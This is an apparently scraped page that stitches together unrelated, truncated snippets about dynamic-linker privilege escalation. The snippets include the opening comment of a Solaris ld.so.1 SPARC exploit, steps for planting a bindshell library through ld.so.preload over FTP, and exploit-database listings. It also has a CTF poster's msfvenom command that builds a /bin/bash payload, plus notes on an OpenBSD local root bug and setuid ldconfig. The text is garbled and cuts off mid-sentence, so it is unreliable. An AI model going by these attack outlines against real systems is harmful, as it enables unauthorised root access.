/* ##### * ## ld.so.1 exploit (SPARC) ## * ##### * [coded by: osker178 (bjr213 psu.edu)] * * Alright, so this exploits a fairly standard buffer * overflow in the default Solaris runtime linker (ld.so.1) * (discovery by Jouko Pynnonen) * Only real deviation here from the standard overflow * and return into libc scenario is that at the time that * overflow occurs, the libc object file has not …
12/15/2006 · # # The exploit works as follows: # 1. Create a shared library including a bindshell # 2. Create a ld.so.preload file referencing the previously created shared library # 3. Connect to the remote ftp server and log in using the ftp account # 4. Upload the shared library and ld.so.preload into /etc # 5.
Solaris 9/10 – ‘ld.so’ Local Privilege Escalation (2). CVE-2005-2072CVE-17614 . local exploit for Solaris platform, GNU C Library Dynamic Loader glibc ld.so – Memory Leak / Buffer Overflow. CVE-2017-1000409CVE-2017-1000408 . local exploit for Linux platform, 12/12/2006 · SecurityFocus is designed to facilitate discussion on computer security related topics, create computer security awareness, and to provide the Internet’s largest and most comprehensive database of computer security knowledge and resources to.
I’m playing some CTF challenges and I’m trying to exploit ld.so.preload to obtain a root shell. I’m currently testing on my local Kali. I generate my payload as follows: msfvenom -p linux/x64/exec CMD=/bin/bash -o elf-so -o /root/bash.so, When executing chpass or passwd (which are setuid root), _dl_setup_env in ld.so tries to strip LD_LIBRARY_PATH from the environment, but fails when it cannot allocate memory. Thus, the attacker is able to execute their own library code as root. CVE-2019-19520. openbsd-authroot OpenBSD local root exploit .
11/21/2018 · Certain security measures have been put in place to avoid this kind of exploits but there was a time where it was possible and I think this is a pretty interesting mechanism to understand.. 3. Setuid bit on ldconfig. ldconfig is used to create, udpate and remove symbolic links for the current shared libraries based on the lib directories present in /etc/ld.so.conf.
